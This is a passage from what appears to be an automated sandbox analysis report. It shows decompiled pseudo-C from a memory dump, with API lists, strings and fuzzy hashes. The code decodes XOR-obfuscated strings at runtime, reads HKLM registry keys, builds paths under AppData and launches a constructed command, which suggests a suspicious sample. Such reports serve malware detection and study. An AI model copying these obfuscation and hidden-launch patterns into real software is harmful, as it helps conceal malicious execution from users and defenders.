				void* _t119;
				void* _t124;
				void* _t133;
				void* _t134;
				char* _t137;
				signed int _t138;
				signed int _t140;
				void* _t141;
				void* _t142;

				_t50 =  *0xea9014; // 0xa413846
				 *(_t140 + 0x3c) = _t50 ^ _t140;
				_push(0x208);
				 *((intOrPtr*)(_t140 + 0x18)) =  *((intOrPtr*)(_t140 + 0x44));
				_t53 = E00E909A2();
				asm("movaps xmm0, [0xe7dd20]");
				_t88 = _t53;
				asm("movups [esp+0x28], xmm0");
				asm("movaps xmm0, [0xe7dc60]");
				_t91 = 0;
				asm("movups [esp+0x34], xmm0");
				 *((char*)(_t140 + 0x44)) = 0;
				do {
					_t5 = _t91 + 0x40; // 0x40
					 *(_t140 + _t91 + 0x24) =  *(_t140 + _t91 + 0x24) ^ _t5;
					_t91 = _t91 + 1;
				} while (_t91 < 0x20);
				_t92 = _t140 + 0x24;
				 *((char*)(_t140 + 0x44)) = 0;
				_t112 = _t88 - _t92;
				do {
					_t56 =  *_t92;
					 *((char*)(_t112 + _t92)) = _t56;
					_t92 = _t92 + 1;
				} while (_t56 != 0);
				 *(_t140 + 0x1c) = 0;
				_t58 = GetCurrentProcess();
				__imp__IsWow64Process(_t58, _t140 + 0x18);
				if(_t58 == 0 ||  *((intOrPtr*)(_t140 + 0x18)) == 0) {
					_t60 = RegOpenKeyA(0x80000002, _t88, _t140 + 0xc);
				} else {
					_t60 = RegOpenKeyExA(0x80000002, _t88, 0, 0x109, _t140 + 0xc);
				}
				if(_t60 == 0) {
					_push(0x104);
					_t137 = E00E909A2();
					RegEnumKeyA( *(_t140 + 0x1c), 0, _t137, 0x104);
					_t19 = _t88 - 1; // -1
					_t118 = _t19;
					do {
						_t65 =  *((intOrPtr*)(_t118 + 1));
						_t118 = _t118 + 1;
					} while (_t65 != 0);
					_t66 =  *0xe7d854; // 0x5c
					_t133 = _t137;
					 *_t118 = _t66;
					do {
						_t67 =  *_t137;
						_t137 =  &(_t137[1]);
					} while (_t67 != 0);
					_t138 = _t137 - _t133;
					_t21 = _t88 - 1; // -1
					_t119 = _t21;
					do {
						_t68 =  *(_t119 + 1);
						_t119 = _t119 + 1;
					} while (_t68 != 0);
					 *(_t140 + 0x1c) = 0x2a230c1c;
					_t97 = _t138 >> 2;
					memcpy(_t119, _t133, _t97 << 2);
					_t141 = _t140 + 0xc;
					 *((short*)(_t141 + 0x20)) = 0x2a;
					memcpy(_t133 + _t97 + _t97, _t133, _t138 & 0x00000003);
					_t142 = _t141 + 0xc;
					_t102 = 0;
					do {
						_t26 = _t102 + 0x40; // 0x40
						 *(_t142 + _t102 + 0x18) =  *(_t142 + _t102 + 0x18) ^ _t26;
						_t102 = _t102 + 1;
					} while (_t102 < 5);
					_t113 = _t142 + 0x18;
					 *((char*)(_t142 + 0x1d)) = 0;
					_t134 = _t113;
					do {
						_t72 =  *_t113;
						_t113 = _t113 + 1;
					} while (_t72 != 0);
					_t114 = _t113 - _t134;
					_t33 = _t88 - 1; // -1
					_t124 = _t33;
					do {
						_t73 =  *(_t124 + 1);
						_t124 = _t124 + 1;
					} while (_t73 != 0);
					_t104 = _t114 >> 2;
					memcpy(_t124, _t134, _t104 << 2);
					_t76 = memcpy(_t134 + _t104 + _t104, _t134, _t114 & 0x00000003);
					_t140 = _t142 + 0x18;
					 *(_t140 + 0x1c) = 0;
					_t77 = GetCurrentProcess();
					__imp__IsWow64Process(_t77, _t76);
					if(_t77 == 0 ||  *((intOrPtr*)(_t140 + 0x18)) == 0) {
						_t79 = RegOpenKeyA(0x80000002, _t88, _t140 + 0x10);
					} else {
						_t79 = RegOpenKeyExA(0x80000002, _t88, 0, 0x101, _t140 + 0x10);
					}
					if(_t79 != 0) {
						goto L27;
					} else {
						_push(0);
						 *((intOrPtr*)(_t140 + 0x20)) = 0x2b362010;
						 *((intOrPtr*)(_t140 + 0x24)) = 0x3f032a10;
						 *((short*)(_t140 + 0x28)) = 0x2d;
						E00E82CCF(_t140 + 0x20,  *(_t140 + 0x1c), E00E82D10(_t140 + 0x20),  *((intOrPtr*)(_t140 + 0x18)));
						RegCloseKey( *(_t140 + 0xc));
						RegCloseKey( *(_t140 + 0x10));
						E00E90985(_t88);
					}
				}
				return E00E8AE43( *(_t140 + 0x48) ^ _t140);
			}

0x00e82969
0x00e82970
0x00e8297b
0x00e82980
0x00e82984
0x00e82989
0x00e82990
0x00e82992
0x00e82998
0x00e8299f
0x00e829a1
0x00e829a6
0x00e829ab
0x00e829ab
0x00e829ae
0x00e829b2
0x00e829b3
0x00e829b8
0x00e829bc
0x00e829c5
0x00e829c7
0x00e829c7
0x00e829c9
0x00e829cc
0x00e829cd
0x00e829d8
0x00e829dc
0x00e829e3
0x00e829eb
0x00e82a17
0x00e829f3
0x00e82a04
0x00e82a04
0x00e82a1f
0x00e82a2b
0x00e82a33
0x00e82a3b
0x00e82a41
0x00e82a41
0x00e82a44
0x00e82a44
0x00e82a47
0x00e82a48
0x00e82a4c
0x00e82a52
0x00e82a54
0x00e82a57
0x00e82a57
0x00e82a5a
0x00e82a5b
0x00e82a5f
0x00e82a61
0x00e82a61
0x00e82a64
0x00e82a64
0x00e82a67
0x00e82a68
0x00e82a6e
0x00e82a76
0x00e82a79
0x00e82a79
0x00e82a7d
0x00e82a87
0x00e82a87
0x00e82a89
0x00e82a8c
0x00e82a8c
0x00e82a8f
0x00e82a93
0x00e82a94
0x00e82a99
0x00e82a9d
0x00e82aa2
0x00e82aa4
0x00e82aa4
0x00e82aa6
0x00e82aa7
0x00e82aab
0x00e82aad
0x00e82aad
0x00e82ab0
0x00e82ab0
0x00e82ab3
0x00e82ab4
0x00e82abe
0x00e82ac1
0x00e82ac8
0x00e82ac8
0x00e82acd
0x00e82ad1
0x00e82ad8
0x00e82ae0
0x00e82b0c
0x00e82ae8
0x00e82af9
0x00e82af9
0x00e82b14
0x00000000
0x00e82b16
0x00e82b16
0x00e82b1f
0x00e82b27
0x00e82b2f
0x00e82b40
0x00e82b4f
0x00e82b55
0x00e82b58
0x00e82b5d
0x00e82b14
0x00e82b73

APIs

GetCurrentProcess.KERNEL32(?), ref: 00E829DC
IsWow64Process.KERNEL32(00000000), ref: 00E829E3
RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00000109,00000000), ref: 00E82A04
RegOpenKeyA.ADVAPI32(80000002,00000000,00000000), ref: 00E82A17
RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 00E82A3B
GetCurrentProcess.KERNEL32(?), ref: 00E82AD1
IsWow64Process.KERNEL32(00000000), ref: 00E82AD8
RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00000101,?), ref: 00E82AF9
RegOpenKeyA.ADVAPI32(80000002,00000000,?), ref: 00E82B0C
RegCloseKey.ADVAPI32(00000000,2A230C1C,00000000,?), ref: 00E82B4F
RegCloseKey.ADVAPI32(?), ref: 00E82B55

Strings

*, xrefs: 00E82A7D
-, xrefs: 00E82B2F
F8A/, xrefs: 00E82969

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: OpenProcess$CloseCurrentWow64$Enum
String ID: *$-$F8A/
API String ID: 1684924610-2096570560
Opcode ID: ac7fe32b162d5cbd23f2b55fc13459427f76eff2205eb6db97e54a493a145353
Instruction ID: 4f0bff3527ef74bb78d5d5782e627023b270fd94ac9e6b6b0e2661c685409282
Opcode Fuzzy Hash: ac7fe32b162d5cbd23f2b55fc13459427f76eff2205eb6db97e54a493a145353
Instruction Fuzzy Hash: 6C5144311083459FDB18DF259C44A6BBBE8FFC9304F00055DFACAA7112D731A909CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00E96AD0, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 268
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00E96AD0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, char* _a8, intOrPtr* _a12, intOrPtr _a16) {
				signed int _v8;
				char _v12;
				char _v16;
				char _v17;
				signed int _v24;
				signed int _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr* _v44;
				signed int* _v48;
				signed int _t45;
				intOrPtr* _t52;
				signed int* _t53;
				signed int* _t55;
				void* _t62;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t69;
				intOrPtr _t70;
				void* _t72;
				signed int* _t75;
				intOrPtr _t78;
				char _t82;
				void* _t84;
				void* _t87;
				signed int _t92;
				intOrPtr* _t94;
				signed int _t102;
				intOrPtr* _t107;
				void* _t111;
				intOrPtr* _t112;
				void* _t125;
				intOrPtr* _t126;
				void* _t127;
				intOrPtr* _t129;
				signed int _t130;
				void* _t132;
				char* _t134;
				intOrPtr* _t135;
				signed int _t136;
				void* _t139;
				void* _t140;
				void* _t141;
				void* _t142;
				void* _t143;

				L0:
				while(1) {
					L0:
					_t45 =  *0xea9014; // 0xa413846
					_v8 = _t45 ^ _t136;
					_t134 = _a8;
					_v32 = _t134;
					_v36 = _a16;
					_t129 = _a12;
					_v44 = _t129;
					if(_t134 == 0) {
						break;
					}
					L2:
					if( *_t134 == 0 || _t129 == 0) {
						break;
					} else {
						L4:
						_t52 =  *_t129;
						if(_t52 == 0) {
							break;
						} else {
							L5:
							_t53 = E00E95BBD();
							_v48 = _t53;
							if( *_t52 != 0) {
								L7:
								_push(_v36);
								_t92 =  *_t53;
								 *_t53 =  *_t53 & 0x00000000;
								_push(_t129);
								_v24 = _t92;
								_t130 = E00E96AC5(_a4, _t134);
								_t140 = _t139 + 0x10;
								if(_t130 != 0xffffffff) {
									L50:
									_t55 = _v48;
									if( *_t55 == 0 && _t92 != 0) {
										 *_t55 = _t92;
									}
									goto L54;
								} else {
									L8:
									if( *(E00E95BBD()) != 2 || E00E8CCD0(_t134, 0x5c) != 0 || E00E8CCD0(_t134, 0x2f) != 0 ||  *((char*)(_t134 + 1)) == 0x3a) {
										L12:
										_t130 = _t130 | 0xffffffff;
										goto L50;
									} else {
										L13:
										_v16 = 0x48544150;
										_t14 =  &_v16; // 0x48544150
										_v12 = 0;
										_v28 = 0;
										_t62 = E00E9185E( &_v28, 0, _t14);
										_t102 = _v28;
										_t141 = _t140 + 0xc;
										if(_t62 == 0) {
											L16:
											if(_t102 != 0) {
												L18:
												_t135 = E00E998AF(0x104, 1);
												if(_t135 == 0) {
													L47:
													_t130 = _t130 | 0xffffffff;
													goto L48;
												} else {
													L19:
													_push(0x103);
													_push(_t135);
													_t66 = E00EA1446(_v28);
													_t142 = _t141 + 0xc;
													_v40 = _t66;
													if(_t66 != 0) {
														L20:
														_t94 = _v32;
														L21:
														while( *_t135 != 0) {
															_t107 = _t135;
															_t22 = _t107 + 1; // 0x1
															_t125 = _t22;
															do {
																L23:
																_t67 =  *_t107;
																_t107 = _t107 + 1;
															} while (_t67 != 0);
															_t23 = _t135 - 1; // -1
															_t132 = _t23 + _t107 - _t125;
															if(_t132 == E00EA5190(_t135, 0x5c) || _t132 == E00EA5190(_t135, 0x2f)) {
																L27:
																_t126 = _t135;
																_t26 = _t126 + 1; // 0x1
																_t111 = _t26;
																do {
																	L28:
																	_t69 =  *_t126;
																	_t126 = _t126 + 1;
																} while (_t69 != 0);
																_t127 = _t126 - _t111;
																_t112 = _t94;
																_t130 = _t112 + 1;
																do {
																	L30:
																	_t70 =  *_t112;
																	_t112 = _t112 + 1;
																} while (_t70 != 0);
																if(_t112 - _t130 + _t127 >= 0x104) {
																	break;
																} else {
																	L32:
																	_t72 = E00EA0E2C(_t135, 0x104, _t94);
																	_t141 = _t142 + 0xc;
																	if(_t72 != 0) {
																		goto L57;
																	} else {
																		L33:
																		_t75 = E00E95BBD();
																		_push(_v36);
																		_push(_v44);
																		 *_t75 =  *_t75 & 0x00000000;
																		_t130 = E00E96AC5(_a4, _t135);
																		_t143 = _t141 + 0x10;
																		if(_t130 != 0xffffffff) {
																			L56:
																			_t92 = _v24;
																			L48:
																			E00E964B8(_t135);
																			_t102 = _v28;
																			goto L49;
																		} else {
																			L34:
																			if( *(E00E95BBD()) == 2 ||  *((intOrPtr*)(E00E95BAA())) == 0x15) {
																				L45:
																				_push(0x103);
																				_push(_t135);
																				_t78 = E00EA1446(_v40);
																				_t142 = _t143 + 0xc;
																				_v40 = _t78;
																				if(_t78 != 0) {
																					continue;
																				} else {
																					break;
																				}
																			} else {
																				L36:
																				_t32 = _t135 + 1; // 0x1
																				_t130 = _t32;
																				if(E00E8CCD0(_t135, 0x2f) != _t135) {
																					L38:
																					_v17 = 0;
																				} else {
																					L37:
																					_t84 = E00E8CCD0(_t130, 0x2f);
																					_v17 = 1;
																					if(_t84 != _t130) {
																						goto L38;
																					}
																				}
																				L39:
																				if(E00E8CCD0(_t135, 0x5c) != _t135 || E00E8CCD0(_t130, 0x5c) != _t130) {
																					_t82 = 0;
																				} else {
																					_t82 = 1;
																				}
																				if(_v17 != 0 || _t82 != 0) {
																					goto L45;
																				} else {
																					break;
																				}
																			}
																		}
																	}
																}
															} else {
																L26:
																_v32 = 0x5c;
																_t87 = E00EA0E2C(_t135, 0x104,  &_v32);
																_t141 = _t142 + 0xc;
																if(_t87 != 0) {
																	goto L57;
																} else {
																	goto L27;
																}
															}
															goto L55;
														}
														L46:
														_t92 = _v24;
													}
													goto L47;
												}
											} else {
												goto L17;
											}
										} else {
											L14:
											if(_t62 == 0x16) {
												L57:
												_push(0);
												_push(0);
												_push(0);
												_push(0);
												_push(0);
												E00E92919();
												asm("int3");
												L58:
												_push(_t136);
												continue;
											} else {
												L15:
												L17:
												_t130 = _t130 | 0xffffffff;
												L49:
												E00E964B8(_t102);
												_v28 = _v28 & 0x00000000;
												goto L50;
											}
										}
									}
								}
							} else {
								L6:
								 *_t53 = 0x16;
								E00E928EC();
								L54:
							}
						}
					}
					L55:
					return E00E8AE43(_v8 ^ _t136);
					L59:
				}
				L1:
				 *(E00E95BBD()) = 0x16;
				E00E928EC();
				goto L55;
			}

0x00e96ad0
0x00e96ad0
0x00e96ad0
0x00e96ad8
0x00e96adf
0x00e96ae6
0x00e96ae9
0x00e96aec
0x00e96af0
0x00e96af3
0x00e96af8
0x00000000
0x00000000
0x00e96b12
0x00e96b15
0x00000000
0x00e96b1b
0x00e96b1b
0x00e96b1b
0x00e96b1f
0x00000000
0x00e96b21
0x00e96b21
0x00e96b24
0x00e96b29
0x00e96b2e
0x00e96b43
0x00e96b43
0x00e96b46
0x00e96b48
0x00e96b4b
0x00e96b50
0x00e96b58
0x00e96b5a
0x00e96b60
0x00e96d69
0x00e96d69
0x00e96d6f
0x00e96d75
0x00e96d75
0x00000000
0x00e96b66
0x00e96b66
0x00e96b6e
0x00e96b92
0x00e96b92
0x00000000
0x00e96b9a
0x00e96b9a
0x00e96b9c
0x00e96ba3
0x00e96ba6
0x00e96bae
0x00e96bb2
0x00e96bb7
0x00e96bba
0x00e96bbf
0x00e96bcc
0x00e96bce
0x00e96bd8
0x00e96be4
0x00e96bea
0x00e96d51
0x00e96d51
0x00000000
0x00e96bf0
0x00e96bf0
0x00e96bf0
0x00e96bf5
0x00e96bf9
0x00e96bfe
0x00e96c01
0x00e96c06
0x00e96c0c
0x00e96c0c
0x00000000
0x00e96c0f
0x00e96c18
0x00e96c1a
0x00e96c1a
0x00e96c1d
0x00e96c1d
0x00e96c1d
0x00e96c1f
0x00e96c20
0x00e96c26
0x00e96c2c
0x00e96c37
0x00e96c67
0x00e96c67
0x00e96c69
0x00e96c69
0x00e96c6c
0x00e96c6c
0x00e96c6c
0x00e96c6e
0x00e96c6f
0x00e96c73
0x00e96c75
0x00e96c77
0x00e96c7a
0x00e96c7a
0x00e96c7a
0x00e96c7c
0x00e96c7d
0x00e96c8d
0x00000000
0x00e96c93
0x00e96c93
0x00e96c96
0x00e96c9b
0x00e96ca0
0x00000000
0x00e96ca6
0x00e96ca6
0x00e96ca6
0x00e96cab
0x00e96cae
0x00e96cb1
0x00e96cbd
0x00e96cbf
0x00e96cc5
0x00e96d8a
0x00e96d8a
0x00e96d54
0x00e96d55
0x00e96d5b
0x00000000
0x00e96ccb
0x00e96ccb
0x00e96cd3
0x00e96d32
0x00e96d32
0x00e96d37
0x00e96d3b
0x00e96d40
0x00e96d43
0x00e96d48
0x00000000
0x00000000
0x00000000
0x00000000
0x00e96cdf
0x00e96cdf
0x00e96ce2
0x00e96ce2
0x00e96cee
0x00e96d02
0x00e96d02
0x00e96cf0
0x00e96cf0
0x00e96cf3
0x00e96cf8
0x00e96d00
0x00000000
0x00000000
0x00e96d00
0x00e96d06
0x00e96d12
0x00e96d26
0x00e96d22
0x00e96d22
0x00e96d22
0x00e96d2c
0x00000000
0x00000000
0x00000000
0x00000000
0x00e96d2c
0x00e96cd3
0x00e96cc5
0x00e96ca0
0x00e96c47
0x00e96c47
0x00e96c4a
0x00e96c57
0x00e96c5c
0x00e96c61
0x00000000
0x00000000
0x00000000
0x00000000
0x00e96c61
0x00000000
0x00e96c37
0x00e96d4e
0x00e96d4e
0x00e96d4e
0x00000000
0x00e96c06
0x00000000
0x00000000
0x00000000
0x00e96bc1
0x00e96bc1
0x00e96bc4
0x00e96d8f
0x00e96d91
0x00e96d92
0x00e96d93
0x00e96d94
0x00e96d95
0x00e96d96
0x00e96d9b
0x00e96d9e
0x00e96d9e
0x00000000
0x00e96bca
0x00e96bca
0x00e96bd0
0x00e96bd0
0x00e96d5e
0x00e96d5f
0x00e96d64
0x00000000
0x00e96d68
0x00e96bc4
0x00e96bbf
0x00e96b6e
0x00e96b30
0x00e96b30
0x00e96b30
0x00e96b36
0x00e96d79
0x00e96d79
0x00e96b2e
0x00e96b1f
0x00e96d7a
0x00e96d89
0x00000000
0x00e96d89
0x00e96afa
0x00e96aff
0x00e96b05
0x00000000

APIs

_free.LIBCMT ref: 00E96D55

Part of subcall function 00E964B8: RtlFreeHeap.NTDLL(00000000,00000000,?,00E9B9CA,?,00000000,?,00000002,?,00E9BC6F,?,00000007,?,?,00E9C2E4,?), ref: 00E964CE
Part of subcall function 00E964B8: GetLastError.KERNEL32(?,?,00E9B9CA,?,00000000,?,00000002,?,00E9BC6F,?,00000007,?,?,00E9C2E4,?,?), ref: 00E964E0

_free.LIBCMT ref: 00E96D5F

Strings

PATH, xrefs: 00E96BA3, 00E96BA9
\, xrefs: 00E96C4A
F8A/, xrefs: 00E96AD8

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: F8A/$PATH$\
API String ID: 776569668-152974505
Opcode ID: 3bb3dfda2a3da9ff17c08deb56d09ca29bd3d175aacd23519173f4ae5ea84f14
Instruction ID: 67891114b003a6b70c096766356c5d6a59dabff9c537fd9a0e73eeba3b310b0e
Opcode Fuzzy Hash: 3bb3dfda2a3da9ff17c08deb56d09ca29bd3d175aacd23519173f4ae5ea84f14
Instruction Fuzzy Hash: 8B815931A002059EEF25BB68DC41BFE7BE59F06328F24215BE924BB2C1EB719D408761

Uniqueness

Uniqueness Score: -1.00%

Function 00E84CEE, Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 188
stringprocessCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00E84CEE(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t50;
				CHAR* _t54;
				intOrPtr _t60;
				void* _t64;
				void _t65;
				void _t66;
				CHAR* _t72;
				char _t75;
				CHAR* _t91;
				signed char _t93;
				void* _t99;
				signed int _t104;
				void* _t110;
				intOrPtr* _t111;
				void* _t114;
				signed int _t115;
				void* _t117;
				void* _t120;
				intOrPtr _t126;
				intOrPtr* _t130;
				void* _t131;
				CHAR* _t132;
				CHAR* _t133;
				void* _t135;
				CHAR* _t136;
				signed int _t138;
				void* _t140;
				void* _t142;

				_t142 = __eflags;
				_t50 =  *0xea9014; // 0xa413846
				 *(_t138 + 0xec) = _t50 ^ _t138;
				 *((intOrPtr*)(_t138 + 0x20)) = E00E909A2();
				E00E82B76(__ebx, 0x104, __esi, _t142, _t52);
				_t54 = E00E909A2();
				_t130 = __imp__SHGetFolderPathA;
				_t91 = _t54;
				 *(_t138 + 0x1c) = _t91;
				 *_t130(0, 0x1a, 0, 0, _t91, 0x208, 0x104, __edi, __esi, _t135, __ebx);
				asm("movaps xmm0, [0xe7db70]");
				_t99 = 0;
				asm("movups [esp+0x78], xmm0");
				 *((intOrPtr*)(_t138 + 0x88)) = 0x2137211f;
				 *((intOrPtr*)(_t138 + 0x8c)) = 0x23057535;
				 *((short*)(_t138 + 0x90)) = 0x3b39;
				 *((intOrPtr*)(_t138 + 0x92)) = 0x3e36;
				do {
					_t8 = _t99 + 0x40; // 0x40
					 *(_t138 + _t99 + 0x78) =  *(_t138 + _t99 + 0x78) ^ _t8;
					_t99 = _t99 + 1;
				} while (_t99 < 0x1d);
				 *((char*)(_t138 + 0x95)) = 0;
				lstrcatA(_t91, _t138 + 0x78);
				_t60 = E00E909A2();
				 *((intOrPtr*)(_t138 + 0x18)) = _t60;
				_t136 = E00E909A2();
				 *_t130(0, 0x1a, 0, 0, _t136, 0x104, 0x40);
				asm("movaps xmm0, [0xe7db70]");
				asm("movups [esp+0x78], xmm0");
				 *((char*)(_t138 + 0x88)) = 0;
				_t64 = E00E82846(_t138 + 0x78);
				_t114 = _t64;
				_t131 = _t64;
				do {
					_t65 =  *_t114;
					_t114 = _t114 + 1;
				} while (_t65 != 0);
				_t115 = _t114 - _t131;
				_t18 = _t136 - 1; // -1
				_t120 = _t18;
				do {
					_t66 =  *(_t120 + 1);
					_t120 = _t120 + 1;
				} while (_t66 != 0);
				_t104 = _t115 >> 2;
				memcpy(_t120, _t131, _t104 << 2);
				memcpy(_t131 + _t104 + _t104, _t131, _t115 & 0x00000003);
				_t140 = _t138 + 0x18;
				_t132 =  *(_t140 + 0x14);
				E00E8A313(lstrcatA, _t132, _t132);
				lstrcatA(_t136, _t132);
				E00E88B24( *((intOrPtr*)(_t140 + 0x1c)), _t136);
				_push(0x514);
				_t72 = E00E909A2();
				asm("movaps xmm0, [0xe7dcf0]");
				_t133 = _t72;
				asm("movups [esp+0x9c], xmm0");
				asm("movaps xmm0, [0xe7dd40]");
				_t110 = 0;
				asm("movups [esp+0xa8], xmm0");
				 *((intOrPtr*)(_t140 + 0xe8)) = 0xbef3e5f1;
				asm("movaps xmm0, [0xe7db30]");
				asm("movups [esp+0xb8], xmm0");
				 *((intOrPtr*)(_t140 + 0xec)) = 0xaae4fcf0;
				asm("movaps xmm0, [0xe7db50]");
				asm("movups [esp+0xc8], xmm0");
				 *((char*)(_t140 + 0xf0)) = 0;
				asm("movaps xmm0, [0xe7df60]");
				asm("movups [esp+0xd8], xmm0");
				do {
					_t26 = _t110 + 0x40; // 0x40
					 *(_t140 + _t110 + 0x98) =  *(_t140 + _t110 + 0x98) ^ _t26;
					_t110 = _t110 + 1;
				} while (_t110 < 0x58);
				_t111 = _t140 + 0x98;
				 *((char*)(_t140 + 0xf0)) = 0;
				_t117 = _t133 - _t111;
				do {
					_t75 =  *_t111;
					 *((char*)(_t117 + _t111)) = _t75;
					_t111 = _t111 + 1;
				} while (_t75 != 0);
				_t93 = 0x62;
				 *((char*)(_t140 + 0x15)) = 0;
				 *((char*)(_t140 + 0x15)) = 0;
				 *(_t140 + 0x14) = _t93 ^ 0x00000040;
				lstrcatA(_t133, _t140 + 0x14);
				lstrcatA(_t133, _t136);
				 *((char*)(_t140 + 0x15)) = 0;
				 *(_t140 + 0x14) = _t93 ^ 0x00000040;
				 *((char*)(_t140 + 0x1d)) = 0;
				lstrcatA(_t133, _t140 + 0x14);
				_t126 = 0x44;
				E00E8D0F0(_t126, _t140 + 0x34, 0, lstrcatA);
				 *((intOrPtr*)(_t140 + 0x3c)) = _t126;
				 *((intOrPtr*)(_t140 + 0x44)) = 0xea99c0;
				asm("stosd");
				_t141 = _t140 + 0xc;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				CreateProcessA( *(_t140 + 0x4c), _t133, 0, 0, 0, 0, 0, 0, _t141 + 0x34, _t141 + 0x20);
				return E00E8AE43( *(_t141 + 0xfc) ^ _t141);
			}

0x00e84cee
0x00e84cf4
0x00e84cfb
0x00e84d13
0x00e84d17
0x00e84d21
0x00e84d26
0x00e84d2c
0x00e84d32
0x00e84d3b
0x00e84d3d
0x00e84d44
0x00e84d46
0x00e84d4b
0x00e84d56
0x00e84d61
0x00e84d6b
0x00e84d76
0x00e84d76
0x00e84d79
0x00e84d7d
0x00e84d7e
0x00e84d87
0x00e84d97
0x00e84d9b
0x00e84da2
0x00e84dac
0x00e84db6
0x00e84db8
0x00e84dc3
0x00e84dc8
0x00e84dd0
0x00e84dd5
0x00e84dd7
0x00e84dd9
0x00e84dd9
0x00e84ddb
0x00e84ddc
0x00e84de0
0x00e84de2
0x00e84de2
0x00e84de5
0x00e84de5
0x00e84de8
0x00e84de9
0x00e84def
0x00e84df2
0x00e84df9
0x00e84df9
0x00e84dfb
0x00e84e00
0x00e84e07
0x00e84e0e
0x00e84e13
0x00e84e18
0x00e84e1d
0x00e84e24
0x00e84e26
0x00e84e2f
0x00e84e36
0x00e84e38
0x00e84e40
0x00e84e4b
0x00e84e52
0x00e84e5a
0x00e84e65
0x00e84e6c
0x00e84e74
0x00e84e7c
0x00e84e83
0x00e84e8b
0x00e84e8b
0x00e84e8e
0x00e84e95
0x00e84e96
0x00e84e9b
0x00e84ea2
0x00e84eae
0x00e84eb0
0x00e84eb0
0x00e84eb2
0x00e84eb5
0x00e84eb6
0x00e84ec2
0x00e84ec5
0x00e84ecc
0x00e84ed1
0x00e84edb
0x00e84edf
0x00e84ee4
0x00e84eed
0x00e84ef5
0x00e84ef9
0x00e84efd
0x00e84f05
0x00e84f0a
0x00e84f14
0x00e84f1c
0x00e84f1d
0x00e84f20
0x00e84f21
0x00e84f22
0x00e84f38
0x00e84f56

APIs

Part of subcall function 00E82B76: GetCurrentProcess.KERNEL32(00000000), ref: 00E82BE0
Part of subcall function 00E82B76: IsWow64Process.KERNEL32(00000000), ref: 00E82BE7
Part of subcall function 00E82B76: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00000101,?), ref: 00E82C08

SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,00000000,00000000,770BE3A0,?,?), ref: 00E84D3B
lstrcatA.KERNEL32(00000000,?), ref: 00E84D97
SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,00000000), ref: 00E84DB6
lstrcatA.KERNEL32(00000000,?,?), ref: 00E84E07
lstrcatA.KERNEL32(00000000,?), ref: 00E84EDB
lstrcatA.KERNEL32(00000000,00000000), ref: 00E84EDF
lstrcatA.KERNEL32(00000000,?), ref: 00E84EF9
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?), ref: 00E84F38

Strings

6>, xrefs: 00E84D6B
F8A/, xrefs: 00E84CF4
Tett, xrefs: 00E84F14
9;, xrefs: 00E84D61

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcat$Process$FolderPath$CreateCurrentOpenWow64
String ID: 6>$9;$F8A/$Tett
API String ID: 3226924228-4224028275
Opcode ID: 269ebfdaed8b14a47488dba969ddf3a74a7281e586eb0322173f55c0310498b6
Instruction ID: 92e215fd9e2a5da2658907036d0697364d160e0c4af9c259ba0d9b7307e0a0c3
Opcode Fuzzy Hash: 269ebfdaed8b14a47488dba969ddf3a74a7281e586eb0322173f55c0310498b6
Instruction Fuzzy Hash: CB61D5614083859EE721DF39DC41BABBBE8EFDA304F00551DF5CCA7162EA7059898B63

Uniqueness

Uniqueness Score: -1.00%

Function 00E9C14B, Relevance: 19.6, APIs: 13, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E9C14B(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0xea90c0) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E00E964B8(_t46);
							E00E9B26F( *((intOrPtr*)(_t74 + 0x88)));
						}
